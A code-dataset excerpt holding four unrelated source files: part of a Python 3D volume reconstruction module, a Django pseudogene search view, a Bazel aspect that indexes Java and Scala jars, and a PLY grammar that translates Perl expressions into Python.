((resolution/2)**2-x2**2-y2**2)\n    r[r < 1] = 1\n    r = np.sqrt(r)\n    r = r/r.max()*2\n\n    return r\n\n\ndef reconstruction_naive(estimated_images, n, resolution, rotation_list_re):\n    mask3d = create_mask3d(resolution)\n    r = create_r(resolution)\n    voxel_shape = (resolution, resolution, resolution)\n\n    V = np.zeros(voxel_shape, dtype=float)\n\n    for i in tqdm(range(n)):\n        estimation = estimated_images[i]\n        # V0=np.broadcast_to(image*r,(resolution,resolution,resolution)).transpose((1,2,0))\n        V0 = np.broadcast_to(estimation / r, voxel_shape).transpose((1, 2, 0))\n        V0 = np.array(V0)\n        V0[~mask3d] = 0\n\n        rotations = rotation_list_re[i]\n        V = V + rotate_volume(V0, rotations[0], rotations[1], rotations[2])\n\n    V = V / n\n\n    return V\n","repo_name":"cedricmendelin/master-thesis","sub_path":"src/utils/Geometry.py","file_name":"Geometry.py","file_ext":"py","file_size_in_byte":6563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"}
{"seq_id":"35814137335","text":"from django.shortcuts import render\nfrom search import get_pseudogene_ids, create_fasta\nfrom create_html import create_html\nimport os\nfrom pseudogene.forms import *\nfrom pseudogene.tables import *\n\n\ndef search_form(request):\n    error = False\n    zero_pseudo = False\n    if 'gene' in request.GET:\n        gene = request.GET['gene'].upper()\n        if not gene:\n            error = True\n        else:\n            # add if gene.html already exists, show straight away\n            no_of_pseudogenes, pseudogene_dict, gene_seq = get_pseudogene_ids(gene)\n            if no_of_pseudogenes == 0:\n                zero_pseudo = True\n            else:\n                infile = create_fasta(no_of_pseudogenes, pseudogene_dict, gene_seq, gene)\n                html_file = create_html(infile, no_of_pseudogenes, gene)\n                html_page = '/home/shjn/PycharmProjects/small_apps/pseudogene/templates/pseudogene/%s' % html_file\n                os.system(\"mv /home/shjn/PycharmProjects/small_apps/%s \"\n                          \"/home/shjn/PycharmProjects/small_apps/pseudogene/templates/pseudogene/\" % html_file)\n                return render(request, 'pseudogene/results.html', {'html_page': html_page})\n\n    return render(request, 'pseudogene/index.html', {'error': error, 'zero': zero_pseudo})\n\n\ndef test_forms(request):\n    form = Form1()\n    table = AnotherTable.make_table([1, 2, 3])\n\n    if request.method == 'POST':\n\n        this_form = Form1(request.POST)\n        if this_form.is_valid():\n            this_obj = this_form.save(commit=False)\n\n    return render(request, 'pseudogene/test.html', {'form': form, 'table': table})\n\n","repo_name":"sarahjamieson/small_apps","sub_path":"pseudogene/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"35237958311","text":"load(\"@bazel_tools//tools/cpp:toolchain_utils.bzl\", \"find_cpp_toolchain\")\nload(\n    \":artifacts.bzl\",\n    \"artifact_location\",\n    \"sources_from_target\",\n    \"struct_omit_none\",\n)\nload(\":providers.bzl\", \"JarIndexerAspectInfo\")\n\n# TODO(pcj): this file was originally copied from the bazel-intellij project and\n# does way more than we need. 
Consider rewriting it from scratch and collecting the java\n# info more simply?\n\n_cpp_header_extensions = [\n    \"hh\",\n    \"hxx\",\n    \"ipp\",\n    \"hpp\",\n]\n\n_c_or_cpp_header_extensions = [\"h\"] + _cpp_header_extensions\n\n_cpp_extensions = [\n    \"cc\",\n    \"cpp\",\n    \"cxx\",\n] + _cpp_header_extensions\n\n_java_rules = [\n    \"java_library\",\n    \"java_binary\",\n    \"java_test\",\n    \"java_proto_library\",\n    \"jvm_import\",\n]\n\n_scala_rules = [\n    \"scala_library\",\n    \"scala_binary\",\n]\n\n_supported_rules = _java_rules + _scala_rules\n\ndef get_aspect_ids(ctx, target):\n    \"\"\"Returns all the aspect ids, filtering out self.\"\"\"\n    aspect_ids = None\n    if hasattr(ctx, \"aspect_ids\"):\n        aspect_ids = ctx.aspect_ids\n    elif hasattr(target, \"aspect_ids\"):\n        aspect_ids = target.aspect_ids\n    else:\n        return None\n    return [aspect_id for aspect_id in aspect_ids if \"intellij_info_aspect\" not in aspect_id]\n\ndef make_dep(dep, dependency_type):\n    \"\"\"Returns a Dependency proto struct.\"\"\"\n    return struct(\n        dependency_type = dependency_type,\n        target = dep.intellij_info.target_key,\n    )\n\ndef make_deps(deps, dependency_type):\n    \"\"\"Returns a list of Dependency proto structs.\"\"\"\n    return [make_dep(dep, dependency_type) for dep in deps]\n\n# Run-time dependency attributes, grouped by type.\nRUNTIME_DEPS = [\n    \"runtime_deps\",\n]\n\nPREREQUISITE_DEPS = []\n\n# Dependency type enum\nCOMPILE_TIME = 0\n\nRUNTIME = 1\n\n# Compile-time dependency attributes, grouped by type.\nDEPS = [\n    \"_cc_toolchain\", # From cc rules\n    \"_stl\", # From cc rules\n    \"malloc\", # From cc_binary rules\n    \"_java_toolchain\", # From java rules\n    \"deps\",\n    \"jars\", # from java_import rules\n    \"exports\",\n    \"java_lib\", # From old proto_library rules\n    \"_android_sdk\", # from android rules\n    \"aidl_lib\", # from android_sdk\n    \"_scala_toolchain\", # From scala rules\n    \"test_app\", # android_instrumentation_test\n    \"instruments\", # android_instrumentation_test\n    \"tests\", # From test_suite\n]\n\n# Defensive list of features that can appear in the C++ toolchain, but which we\n# definitely don't want to enable (when enabled, they'd contribute command line\n# flags that don't make sense in the context of intellij info).\nUNSUPPORTED_FEATURES = [\n    \"thin_lto\",\n    \"module_maps\",\n    \"use_header_modules\",\n    \"fdo_instrument\",\n    \"fdo_optimize\",\n]\n\ndef make_target_key(label, aspect_ids):\n    \"\"\"Returns a TargetKey proto struct from a target.\"\"\"\n    return struct_omit_none(\n        aspect_ids = tuple(aspect_ids) if aspect_ids else None,\n        label = str(label),\n    )\n\ndef library_artifact(java_output):\n    \"\"\"Creates a LibraryArtifact representing a given java_output.\"\"\"\n    if java_output == None or java_output.class_jar == None:\n        return None\n    src_jars = get_source_jars(java_output)\n    return struct_omit_none(\n        interface_jar = artifact_location(java_output.ijar),\n        jar = artifact_location(java_output.class_jar),\n        source_jar = artifact_location(src_jars[0]) if src_jars else None,\n        source_jars = [artifact_location(f) for f in src_jars],\n    )\n\ndef _is_proto_library_wrapper(target, ctx):\n    \"\"\"Returns True if the target is an empty shim around a proto library.\"\"\"\n    if not ctx.rule.kind.endswith(\"proto_library\") or ctx.rule.kind == \"proto_library\":\n        return False\n\n    # treat any *proto_library rule with a single proto_library dep as a shim\n    deps = collect_targets_from_attrs(ctx.rule.attr, [\"deps\"])\n    return len(deps) == 1 and deps[0].intellij_info and deps[0].intellij_info.kind == \"proto_library\"\n\ndef 
_get_forwarded_deps(target, ctx):\n    \"\"\"Returns the list of deps of this target to forward.\n\n    Used to handle wrapper/shim targets which are really just pointers to a\n    different target (for example, java_proto_library)\n    \"\"\"\n    if _is_proto_library_wrapper(target, ctx):\n        return collect_targets_from_attrs(ctx.rule.attr, [\"deps\"])\n    return []\n\ndef get_source_jars(output):\n    \"\"\"Returns a list of source jars from the output.\"\"\"\n    if hasattr(output, \"source_jars\"):\n        return output.source_jars\n    if hasattr(output, \"source_jar\"):\n        return [output.source_jar]\n    return []\n\ndef jars_from_output(output):\n    \"\"\"Collect jars for intellij-resolve-files from Java output.\"\"\"\n    if output == None:\n        return []\n    return [\n        jar\n        for jar in ([output.class_jar, output.ijar] + get_source_jars(output))\n        if jar != None and not jar.is_source\n    ]\n\ndef _collect_generated_files(java):\n    \"\"\"Collects generated files from a Java target\"\"\"\n    if hasattr(java, \"java_outputs\"):\n        return [\n            (outputs.generated_class_jar, outputs.generated_source_jar)\n            for outputs in java.java_outputs\n            if outputs.generated_class_jar != None\n        ]\n\n    # Handles Bazel versions before 5.0.0.\n    if (hasattr(java, \"annotation_processing\") and java.annotation_processing and java.annotation_processing.enabled):\n        return [(java.annotation_processing.class_jar, java.annotation_processing.source_jar)]\n    return []\n\ndef annotation_processing_jars(generated_class_jar, generated_source_jar):\n    \"\"\"Creates a LibraryArtifact representing Java annotation processing jars.\"\"\"\n    src_jar = generated_source_jar\n    return struct_omit_none(\n        jar = artifact_location(generated_class_jar),\n        source_jar = artifact_location(src_jar),\n        source_jars = [artifact_location(src_jar)] if src_jar else None,\n    )\n\ndef get_java_provider(target):\n    \"\"\"Find a provider exposing java compilation/outputs data.\"\"\"\n\n    # Check for scala and kt providers before JavaInfo. e.g. 
scala targets have\n # JavaInfo, but their data lives in the \"scala\" provider and not JavaInfo.\n # See https://github.com/bazelbuild/intellij/pull/1202\n if hasattr(target, \"scala\"):\n return target.scala\n if hasattr(target, \"kt\") and hasattr(target.kt, \"outputs\"):\n return target.kt\n if JavaInfo in target:\n return target[JavaInfo]\n if hasattr(java_common, \"JavaPluginInfo\") and java_common.JavaPluginInfo in target:\n return target[java_common.JavaPluginInfo]\n return None\n\ndef update_set_in_dict(input_dict, key, other_set):\n fail(\"not used\")\n \"\"\"Updates depset in dict, merging it with another depset.\"\"\"\n input_dict[key] = depset(transitive = [input_dict.get(key, depset()), other_set])\n\ndef divide_java_sources(ctx):\n \"\"\"Divide sources into plain java, generated java, and srcjars.\"\"\"\n\n java_sources = []\n gen_java_sources = []\n srcjars = []\n if hasattr(ctx.rule.attr, \"srcs\"):\n srcs = ctx.rule.attr.srcs\n for src in srcs:\n for f in src.files.to_list():\n if f.basename.endswith(\".java\"):\n if f.is_source:\n java_sources.append(f)\n else:\n gen_java_sources.append(f)\n elif f.basename.endswith(\".srcjar\"):\n srcjars.append(f)\n\n return java_sources, gen_java_sources, srcjars\n\ndef _is_cpp_target(srcs):\n fail(\"not used\")\n if all([src.extension in _c_or_cpp_header_extensions for src in srcs]):\n return True # assume header-only lib is c++\n return any([src.extension in _cpp_extensions for src in srcs])\n\ndef _is_objcpp_target(srcs):\n fail(\"not used\")\n return any([src.extension == \"mm\" for src in srcs])\n\ndef _sources(ctx, target):\n fail(\"not used\")\n srcs = []\n if hasattr(ctx.rule.attr, \"srcs\"):\n srcs += [f for src in ctx.rule.attr.srcs for f in src.files.to_list()]\n if hasattr(ctx.rule.attr, \"hdrs\"):\n srcs += [f for src in ctx.rule.attr.hdrs for f in src.files.to_list()]\n\n return srcs\n\ndef is_valid_aspect_target(target):\n \"\"\"Returns whether the target has had the aspect run on it.\"\"\"\n return hasattr(target, \"intellij_info\")\n\ndef _collect_target_from_attr(rule_attrs, attr_name, result):\n \"\"\"Collects the targets from the given attr into the result.\"\"\"\n if not hasattr(rule_attrs, attr_name):\n return\n attr_value = getattr(rule_attrs, attr_name)\n type_name = type(attr_value)\n if type_name == \"Target\":\n result.append(attr_value)\n elif type_name == \"list\":\n result.extend(attr_value)\n\ndef collect_targets_from_attrs(rule_attrs, attrs):\n \"\"\"Returns a list of targets from the given attributes.\"\"\"\n result = []\n for attr_name in attrs:\n _collect_target_from_attr(rule_attrs, attr_name, result)\n return [target for target in result if is_valid_aspect_target(target)]\n\ndef _jarindex_basename(ctx, label):\n return \"-\".join([\n # # ctx.label.workspace_name if ctx.label.workspace_name else \"ctx\",\n # ctx.label.package if ctx.label.package else \"_\",\n ctx.label.name,\n label.workspace_name if label.workspace_name else \"default\",\n label.package if label.package else \"_\",\n label.name,\n ])\n\ndef jarindexer_action(ctx, label, kind, executable, jar):\n output_file = ctx.actions.declare_file(_jarindex_basename(ctx, label) + \".javaindex.pb\")\n ctx.actions.run(\n mnemonic = \"JarIndexer\",\n progress_message = \"Indexing \" + jar.basename,\n executable = executable,\n arguments = [\n \"--label\",\n str(label),\n \"--kind\",\n kind,\n \"--output_file\",\n output_file.path,\n jar.path,\n ],\n inputs = [jar],\n outputs = [output_file],\n )\n return output_file\n\ndef 
collect_java_toolchain_info(target, ide_info, ide_info_file):\n \"\"\"Updates java_toolchain-relevant output groups, returns false if not a java_toolchain target.\"\"\"\n if hasattr(target, \"java_toolchain\"):\n toolchain = target.java_toolchain\n elif java_common.JavaToolchainInfo != platform_common.ToolchainInfo and \\\n java_common.JavaToolchainInfo in target:\n toolchain = target[java_common.JavaToolchainInfo]\n else:\n return False\n\n javac_jars = []\n if hasattr(toolchain, \"tools\"):\n javac_jars = [\n artifact_location(f)\n for f in toolchain.tools.to_list()\n if f.basename.endswith(\".jar\")\n ]\n ide_info[\"java_toolchain_ide_info\"] = struct_omit_none(\n javac_jars = javac_jars,\n source_version = toolchain.source_version,\n target_version = toolchain.target_version,\n )\n\n return True\n\ndef collect_java_info(ctx, target, feature_configuration, cc_toolchain, ide_info, jar_index_files):\n java = get_java_provider(target)\n if not java:\n return False\n if hasattr(java, \"java_outputs\") and java.java_outputs:\n java_outputs = java.java_outputs\n elif hasattr(java, \"outputs\") and java.outputs:\n java_outputs = java.outputs.jars\n else:\n return False\n\n java_semantics = None\n\n # java_semantics = semantics.java if hasattr(semantics, \"java\") else None\n if java_semantics and java_semantics.skip_target(target, ctx):\n return False\n\n sources = sources_from_target(ctx)\n jars = [library_artifact(output) for output in java_outputs]\n class_jars = [output.class_jar for output in java_outputs if output and output.class_jar]\n output_jars = [jar for output in java_outputs for jar in jars_from_output(output)]\n resolve_files = output_jars\n compile_files = class_jars\n\n gen_jars = []\n for generated_class_jar, generated_source_jar in _collect_generated_files(java):\n gen_jars.append(annotation_processing_jars(generated_class_jar, generated_source_jar))\n resolve_files += [\n jar\n for jar in [\n generated_class_jar,\n generated_source_jar,\n ]\n if jar != None and not jar.is_source\n ]\n compile_files += [\n jar\n for jar in [generated_class_jar]\n if jar != None and not jar.is_source\n ]\n\n jdeps = None\n jdeps_file = None\n if java_semantics and hasattr(java_semantics, \"get_filtered_jdeps\"):\n jdeps_file = java_semantics.get_filtered_jdeps(target)\n if jdeps_file == None and hasattr(java, \"outputs\") and hasattr(java.outputs, \"jdeps\") and java.outputs.jdeps:\n jdeps_file = java.outputs.jdeps\n if jdeps_file:\n jdeps = artifact_location(jdeps_file)\n resolve_files.append(jdeps_file)\n\n java_sources, gen_java_sources, srcjars = divide_java_sources(ctx)\n\n if java_semantics:\n srcjars = java_semantics.filter_source_jars(target, ctx, srcjars)\n\n # Custom lint checks are incorporated as java plugins. 
We collect them here and register them with the IDE so that the IDE can also run the same checks.\n plugin_processor_jars = []\n if hasattr(java, \"annotation_processing\") and java.annotation_processing:\n plugin_processor_jar_files = java.annotation_processing.processor_classpath.to_list()\n resolve_files += plugin_processor_jar_files\n plugin_processor_jars = [annotation_processing_jars(jar, None) for jar in plugin_processor_jar_files]\n\n if java_outputs:\n class_jars = [info.class_jar for info in java_outputs]\n for jar in class_jars:\n if not jar.basename.endswith(\"_java.jar\"):\n jar_index_file = jarindexer_action(ctx, target.label, ctx.rule.kind, ctx.executable._jarindexer, jar)\n jar_index_files.append(jar_index_file)\n\n java_info = struct_omit_none(\n generated_jars = gen_jars,\n jars = jars,\n jdeps = jdeps,\n main_class = getattr(ctx.rule.attr, \"main_class\", None),\n sources = sources,\n test_class = getattr(ctx.rule.attr, \"test_class\", None),\n )\n\n ide_info[\"java_ide_info\"] = java_info\n\n return True\n\ndef _java_indexer_aspect_impl(target, ctx):\n deps = []\n if hasattr(ctx.rule.attr, \"deps\"):\n deps.extend(ctx.rule.attr.deps)\n if hasattr(ctx.rule.attr, \"runtime_deps\"):\n deps.extend(ctx.rule.attr.runtime_deps)\n\n transitive_info_file = []\n transitive_jar_index_files = []\n java_info_files = []\n for dep in deps:\n if JarIndexerAspectInfo not in dep:\n continue\n transitive_info_file.append(dep[JarIndexerAspectInfo].info_file)\n transitive_jar_index_files.append(dep[JarIndexerAspectInfo].jar_index_files)\n java_info_files.append(dep[OutputGroupInfo].java_info_files)\n\n # We support only these rule kinds.\n if ctx.rule.kind not in _supported_rules:\n return [\n JarIndexerAspectInfo(\n info_file = depset(transitive = transitive_info_file),\n jar_index_files = depset(transitive = transitive_jar_index_files),\n ),\n OutputGroupInfo(\n java_info_files = depset(transitive = java_info_files),\n ),\n ]\n\n cc_toolchain = find_cpp_toolchain(ctx)\n feature_configuration = cc_common.configure_features(\n ctx = ctx,\n cc_toolchain = cc_toolchain,\n requested_features = ctx.features,\n unsupported_features = ctx.disabled_features + UNSUPPORTED_FEATURES,\n )\n\n rule_attrs = ctx.rule.attr\n\n # Collect direct dependencies\n direct_dep_targets = collect_targets_from_attrs(\n rule_attrs,\n DEPS,\n )\n direct_deps = make_deps(direct_dep_targets, COMPILE_TIME)\n\n # Add exports from direct dependencies\n exported_deps_from_deps = []\n for dep in direct_dep_targets:\n exported_deps_from_deps = exported_deps_from_deps + dep.intellij_info.export_deps\n\n # Combine into all compile time deps\n compiletime_deps = direct_deps + exported_deps_from_deps\n\n # Propagate my own exports\n export_deps = []\n direct_exports = []\n if JavaInfo in target:\n direct_exports = collect_targets_from_attrs(rule_attrs, [\"exports\"])\n export_deps.extend(make_deps(direct_exports, COMPILE_TIME))\n\n # Collect transitive exports\n for export in direct_exports:\n export_deps.extend(export.intellij_info.export_deps)\n\n if ctx.rule.kind == \"android_library\":\n # Empty android libraries export all their dependencies.\n if not hasattr(rule_attrs, \"srcs\") or not ctx.rule.attr.srcs:\n export_deps.extend(compiletime_deps)\n\n # Deduplicate the entries\n export_deps = depset(export_deps).to_list()\n\n # runtime_deps\n runtime_dep_targets = collect_targets_from_attrs(\n rule_attrs,\n RUNTIME_DEPS,\n )\n runtime_deps = make_deps(runtime_dep_targets, RUNTIME)\n all_deps = depset(compiletime_deps + 
runtime_deps).to_list()\n\n    # extra prerequisites\n    extra_prerequisite_targets = collect_targets_from_attrs(\n        rule_attrs,\n        PREREQUISITE_DEPS,\n    )\n\n    forwarded_deps = _get_forwarded_deps(target, ctx) + direct_exports\n\n    # Roll up output files from my prerequisites\n    prerequisites = direct_dep_targets + runtime_dep_targets + extra_prerequisite_targets + direct_exports\n    output_groups = dict()\n    for dep in prerequisites:\n        for k, v in dep.intellij_info.output_groups.items():\n            if dep in forwarded_deps:\n                # unconditionally roll up deps for these targets\n                output_groups[k] = output_groups[k] + [v] if k in output_groups else [v]\n                continue\n\n            # roll up outputs of direct deps into '-direct-deps' output group\n            if k.endswith(\"-direct-deps\"):\n                continue\n            if k.endswith(\"-outputs\"):\n                directs = k[:-len(\"outputs\")] + \"direct-deps\"\n                output_groups[directs] = output_groups[directs] + [v] if directs in output_groups else [v]\n                continue\n\n            # everything else gets rolled up transitively\n            output_groups[k] = output_groups[k] + [v] if k in output_groups else [v]\n\n    # Convert output_groups from lists to depsets after the lists are finalized. This avoids\n    # creating and growing depsets gradually, as that results in depsets many levels deep:\n    # a construct which would give the build system some trouble.\n    for k, v in output_groups.items():\n        output_groups[k] = depset(transitive = output_groups[k])\n\n    # Initialize the ide info dict, and corresponding output file\n    # This will be passed to each language-specific handler to fill in as required\n    file_name = target.label.name\n\n    # bazel allows target names differing only by case, so append a hash to support\n    # case-insensitive file systems\n    file_name = file_name + \"-\" + str(hash(file_name))\n    aspect_ids = get_aspect_ids(ctx, target)\n    if aspect_ids:\n        aspect_hash = hash(\".\".join(aspect_ids))\n        file_name = file_name + \"-\" + str(aspect_hash)\n    file_name = file_name + \".java_info.json\"\n    ide_info_file = ctx.actions.declare_file(file_name)\n\n    output_groups = dict()\n    target_key = make_target_key(target.label, aspect_ids)\n    ide_info = dict(\n        # build_file_artifact_location = build_file_artifact_location(ctx),\n        features = ctx.features,\n        key = target_key,\n        kind_string = ctx.rule.kind,\n        tags = ctx.rule.attr.tags,\n        deps = list(all_deps),\n    )\n\n    jar_index_files = []\n    if ctx.rule.kind in _supported_rules:\n        handled = False\n        handled = collect_java_info(ctx, target, feature_configuration, cc_toolchain, ide_info, jar_index_files)\n        handled = collect_java_toolchain_info(target, ide_info, ide_info_file) or handled\n    else:\n        fail(\"unsupported java_index rule: \\\"%s\\\" (must be one of %s)\" % (ctx.rule.kind, _supported_rules))\n\n    # Write the commands for this target.\n    info = struct_omit_none(**ide_info)\n    ctx.actions.write(\n        content = json.encode(info),\n        output = ide_info_file,\n    )\n\n    info_file = depset([ide_info_file], transitive = transitive_info_file)\n\n    return [\n        JarIndexerAspectInfo(\n            info_file = info_file,\n            jar_index_files = depset(direct = jar_index_files, transitive = transitive_jar_index_files),\n        ),\n        OutputGroupInfo(\n            java_info_files = depset([ide_info_file], transitive = java_info_files),\n            jar_index_files = depset(jar_index_files, transitive = transitive_jar_index_files),\n        ),\n    ]\n\njava_indexer_aspect = aspect(\n    attr_aspects = [\"deps\", \"runtime_deps\"],\n    attrs = {\n        \"_cc_toolchain\": attr.label(\n            default = Label(\"@bazel_tools//tools/cpp:current_cc_toolchain\"),\n        
),\n        \"_jarindexer\": attr.label(\n            default = Label(\"@build_stack_scala_gazelle//cmd/jarindexer:jarindexer_bin\"),\n            cfg = \"exec\",\n            executable = True,\n        ),\n    },\n    fragments = [\"cpp\", \"java\"],\n    provides = [JarIndexerAspectInfo],\n    toolchains = [\"@bazel_tools//tools/cpp:toolchain_type\"],\n    implementation = _java_indexer_aspect_impl,\n    apply_to_generating_rules = True,\n)\n","repo_name":"stackb/scala-gazelle","sub_path":"rules/java_indexer_aspect.bzl","file_name":"java_indexer_aspect.bzl","file_ext":"bzl","file_size_in_byte":21275,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"76"}
{"seq_id":"28575788575","text":"#variables\nimport constants_mod\nconstants = constants_mod.constants\naddmulop=['+','-','**','*','/','%']\nmatch={'gt':'>','lt':'<','ge':'>=','le':'<=','eq':'==','ne':'!=','&&':'and','||':'or'}\nbit=['&','|','^']\nintops=['<<','>>','~'] #work only on ints\niss=lambda x: (type(x)==str) and ((\"'\" in x) or ('\"' in x)) #check if term is string\niv=lambda x: (type(x) == str) and ((\"$\" in x) or ('%' in x) or ('@' in x) ) #check if term is variable \n\nprecedence = ( #operator precedence and associativity table \n    ('left', 'WOR', 'WXOR'),\n    ('left', 'WAND'),\n    ('right','WNOT'),\n    ('left','COMMA','HASH_OP'),\n    ('right','ASSIGNOP'),\n    ('nonassoc','DOTDOT'),\n    ('left','OROR','DORDOR'),\n    ('left','ANDAND'),\n    ('left','BITOROP'),\n    ('left','BITANDOP'),\n    ('nonassoc','RELOP'),\n    ('left','SHIFTOP'),\n    ('left','ADDOP'),\n    ('left','MULOP'),\n    ('left','MATCHOP'),\n    ('right','!','~'),\n    ('right','UMINUS'),\n    ('right', 'POWOP'),\n    ('nonassoc', 'INCREMENT', 'DECREMENT'),\n    ('left','DEREF'),\n)\n\n#Expressions Grammer\n\n# binary operators\ndef p_termbinop(p): \n    '''termbinop : term POWOP term\n              | term MULOP term\n              | term ADDOP term\n              | term SHIFTOP term\n              | term RELOP term\n              | term EQOP term\n              | term BITANDOP term\n              | term BITOROP term\n              | term DOTDOT term\n              | term ANDAND term\n              | term OROR term\n              | term DORDOR term\n              | term MATCHOP term\n              | term WAND term\n              | term WOR term\n              | term WXOR term'''\n\n    if p[2] == '//' and iv(p[1]) and iv(p[3]):\n        if iss(p[1]):\n            a=p[1][2:-1]\n        else:\n            a=p[1][1:]\n        if iss(p[3]):\n            b = p[3][2:-1]\n        else:\n            b = p[3][1:]\n        \n        p[0] = \"dor( \"+a+\" , \"+b+\" )\"\n\n    elif p[2] == '//' and ((not iv(p[1])) or (not iv(p[3]))):\n        raise Exception(\"Syntax Error\")\n\n    else :\n        if iss(p[1]) and iv(p[1]):\n            p[1]=p[1][2:-1]\n        elif iv(p[1]):\n            p[1]=p[1][1:]\n        if iss(p[3]) and iv(p[3]):\n            p[3]= p[3][2:-1]\n        elif iv(p[3]):\n            p[3]= p[3][1:]\n        if p[2] in match:\n            p[0]=p[1]+\" \"+match[p[2]]+\" \"+p[3]\n        elif p[2] in match.values():\n            p[0] = p[1]+\" \"+p[2]+\" \"+p[3]\n        elif p[2]=='cmp' or p[2]=='<=>':\n            p[0]=\"cmp( \"+p[1]+\",\"+p[3]+\" )\"\n        elif (p[2] in addmulop):\n            if iss(p[1]) and iss(p[3]):\n                p[0] = \"str2float( \"+p[1]+\") \"+str(p[2])+\" str2float( \"+p[3]+\" )\"\n            else :\n                p[0] = str(p[1])+\" \"+p[2]+\" \"+str(p[3])\n        elif (p[2] in bit):\n            if iss(p[1]) and iss(p[3]):\n                p[0] = \"strbitwise( \"+p[1]+\",\"+p[2]+\",\"+p[3]+\" )\"\n            else :\n                p[0] = \"int(\"+str(p[1])+\") \"+p[2]+\" int(\"+str(p[3])+\")\"\n        elif p[2]=='.':\n            p[0] = p[1]+\" + \"+p[3]\n        elif p[2] == 'x':\n            p[0] = p[1]+\" * \"+p[3]\n        elif p[2] in intops:\n            if iss(p[1]) and iss(p[3]):\n                p[0] = \"str2int( \"+p[1]+\") \"+p[2]+\" str2int( \"+p[3]+\" )\"\n            else :\n                p[0] = \"int(\"+str(p[1])+\") \"+p[2]+\" int(\"+str(p[3])+\")\"\n        elif p[2] == 'and':\n            p[0] = str(p[1])+\" \"+\" and \"+\" \"+str(p[3])\n        elif p[2] == 'or':\n            p[0] = str(p[1])+\" \"+\" or \"+\" 
\"+str(p[3])\n elif p[2] == 'xor':\n p[0] = str(p[1])+\" \"+\" ^ \"+\" \"+str(p[3])\n\n# unary operators\ndef p_termunop(p):\n '''termunop : ADDOP term %prec UMINUS \n | '!' term\n | '~' term \n | term INCREMENT\n | term DECREMENT\n | term DEREF\n | INCREMENT term\n | DECREMENT term\n | WNOT term'''\n if iss(p[1]) and iv(p[1]):\n p[1] = p[1][2:-1]\n elif iv(p[1]):\n p[1] = p[1][1:]\n if iss(p[2]) and iv(p[2]):\n p[2] = p[2][2:-1]\n elif iv(p[2]):\n p[2] = p[2][1:]\n if p[1]=='!':\n p[0]='not '+str(p[2])\n elif p[1] == '-':\n if iss(p[2]):\n p[0]=\"-\"+str(p[2][1:-1])\n else:\n p[0]= \"-\"+str(p[2])\n elif p[1]=='+':\n if iss(p[2]):\n p[0] = str(p[2][1:-1])\n else:\n p[0] = str(p[2])\n elif p[1]=='~':\n p[0] = \"~str2int(\"+str(p[2])+\")\"\n elif p[1]=='++':\n p[0]=\"PreIncrement('\"+str(p[2])+\"',locals())\" # found in ctools module\n elif p[1] == '--':\n p[0]=\"PreDecrement('\"+str(p[2])+\"',locals())\"\n elif p[2] == '++':\n p[0]=\"PostIncrement('\"+str(p[1])+\"',locals())\"\n elif p[2] == '--':\n p[0]=\"PostDecrement('\"+str(p[1])+\"',locals())\"\n else:\n p[0] = 'not '+str(p[2])\n\n#all the various types of terms\ndef p_term(p):\n '''term : termbinop\n\t | termunop\n | PARANTHESIS_L term PARANTHESIS_R\n | NAME\n | SCALAR NAME\n | NUMBER\n | STRING\n | var_deref\n | sub_script\n | term '?' term ':' term \n | Q BRACES_LEFT NAME BRACES_RIGHT\n | QQ BRACES_LEFT NAME BRACES_RIGHT\n | QX BRACES_LEFT NAME BRACES_RIGHT'''\n if p[1]=='(':\n p[0]=\"(\"+str(p[2])+\")\"\n elif len(p)==5:\n if ('q' in p[1]): # for quote like operators\n p[0]=\"'\"+p[3]+\"'\"\n elif ('qq' in p[1]):\n p[0]=\"\\\"\"+p[3]+\"\\\"\"\n elif ('qx' in p[1]):\n p[0]=\"`\"+p[3]+\"`\"\n elif len(p)==6:\n p[0]=str(p[3])+\" if \"+str(p[1])+\" else \"+str(p[5])\n elif len(p)==3:\n p[0] = \"len( \"+p[2][1:]+\")\"\n else :\n p[0]=p[1]\n\ndef var_dec_helper(p, i):\n if p[2-i][0] == '$': #in case of scalars\n if str(p[4-i]) == \"shift\":\n if constants.in_package == True and constants.first_line == 0:\n constants.first_line = 1\n p[0] = []\n else:\n p[0] = ('self.' 
+ p[2-i][1:] + '=arg_list.pop()')\n        else :\n            var_dec_scalar_helper(p,i)\n    elif p[2-i][0] == '@': #in case of arrays\n        p[0] = p[2-i][1:] + '=' + str(p[4-i])\n    elif '[' in p[2-i]: #in case of initialization for a particular index of array\n        p1 = p[2-i].split('[')\n        p[0] = \"insert_into( \"+p1[0]+\" , \"+p1[1].split(']')[0]+\" , \"+str(p[4-i])+\" )\"\n    elif p[2-i][0] == '%': #in case of hashes\n        p[0] = p[2-i][1:] + '=' + str(p[4-i])\n    else:\n        p[0] = p[2-i][1:] + '=' + str(p[4-i])\n\n\ndef var_dec_scalar_helper(p, i):\n    if p[3-i] in ['+=', '-=', '/=', '%=', '**=', '&=', '^=', '|=', '>>=', '<<=']:\n        p[0] = p[2-i][1:] + p[3-i] + str(p[4-i])\n    elif p[3-i] in ['&&=', '//=', '||=']:\n        if p[3-i] == '&&=':\n            p[0] = p[2-i][1:]+\" = \"+p[2-i][1:]+\" and \"+str(p[4-i])\n        elif p[3-i] == '//=':\n            p[0] = p[2-i][1:]+\" = \" + \"dor( \"+p[2-i][1:]+\" , \"+str(p[4-i])+\" )\"\n        else:\n            p[0] = p[2-i][1:]+\" = \"+p[2-i][1:]+\" or \"+str(p[4-i])\n    elif p[3-i] in ['&.=', '^.=', '|.=']:\n        p[0] = p[2-i][1:]+\" = \" + \"strbitwise( \"+p[2-i][1:]+\" , \" + p[3-i][0]+\" , \"+str(p[4-i])+\" )\"\n    else:\n        if p[3-i] == '.=':\n            p[0] = p[2-i][1:] + \" += \" + str(p[4-i])\n        elif p[3-i] == 'x=':\n            p[0] = p[2-i][1:] + \" *= \" + str(p[4-i])\n        else:\n            if '@' in str(p[4-i]):\n                p[0] = \"len( \"+p[4-i][1:]+\")\"\n            else:\n                p[0] = p[2-i][1:] + \" = \" + str(p[4-i])\n","repo_name":"skandavc18/OOPerl","sub_path":"parse_expressions.py","file_name":"parse_expressions.py","file_ext":"py","file_size_in_byte":7602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
